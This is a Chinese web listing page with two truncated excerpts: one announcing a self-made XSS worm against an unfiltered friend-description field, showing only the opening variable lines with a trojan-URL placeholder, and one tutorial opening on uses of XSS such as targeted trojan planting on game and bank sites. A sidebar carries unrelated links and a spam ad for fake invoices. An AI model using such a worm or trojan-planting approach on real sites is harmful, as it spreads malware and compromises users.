from:恶魔傻蛋网络研究中心
呵呵....发现留这个东西实在没什么用处,就在这个群里首发吧.~~呵呵.希望能有对我们ncu网络安全事业有点促进作用~~呵呵.
大家别去干坏事哦~~~
呵呵,自我感觉这个worm写还不错.嘿嘿.~
大家学习参考的用,危害极大,如有人用于非法用途,概不负责.
存在漏洞页面:特别好友描述那里,没有做任何过滤~
=
以下是worm代码
=
var url = ""; //本段代码地址如:http://www.emodd.com/other/1.txt
var maurl = ""; //木马URL,和下面marame参数和 [阅读全文] [PDF]
或许大家经常看些高手测试XSS漏洞都是alert个窗口来便以为XSS即是如此当自己alert出窗口来便说自己发现了漏洞
其实远没这么简单你发现只是员个小bug而已远谈不上XSS它们关系如同系统漏洞和漏洞利用关系不可同日而语你系统是否出现过“****内存不能为read”?你是否知道它是溢出漏洞种表现呢?但想因此做出exploit远不是那么简单事情你能说自己发现了溢出漏洞了么?
XSS高手们那些XSS大家都是可以拿出来做些什么这样东西才能算得上漏洞
那么利用xss漏洞能做什么?Monyer认为应该有几点:
1、针对性挂马
所以这类网站WebSite定是游戏网站WebSite银行网站Web [阅读全文] [PDF]
1 共2条 分1页
- +_@开青岛发票13434444051程生
- 一个简单的 2层系统分析全程
- 主题和皮肤系列(3)
- 主题和皮肤系列(1)
- 主题和皮肤系列(2)
- 鼠标移上去显示层:鼠标滑过显示隐藏层(转)
- jspajax自动刷新:jsp+ajax自动刷新例子(转)
- form表单验证:用js将form表单同时提交到两个区别页面的思路方法
- php上传代码:php统计代码总行数
- 最佳网页宽度及其实现
- 联想2155:PKU 2155
- micboost什么意思:Boost 概述
- atmega16ucosii:μC/OS-II实时性能测试和分析
- cssimportant:4 种实时操作系统实时性的分析对比 --转 time too important
- 基于OHCI的USB主机 —— 总体构架
- 虚拟主机usb:基于OHCI的USB主机 —— 背景介绍
- vc用法:VC使用方法汇总
- 张孝祥《Java就业培训教程》源代码 02 部分
- 抽象类和接口:详细解析Java中抽象类和接口的区别
- 跟踪技术:JSP中的会话跟踪技术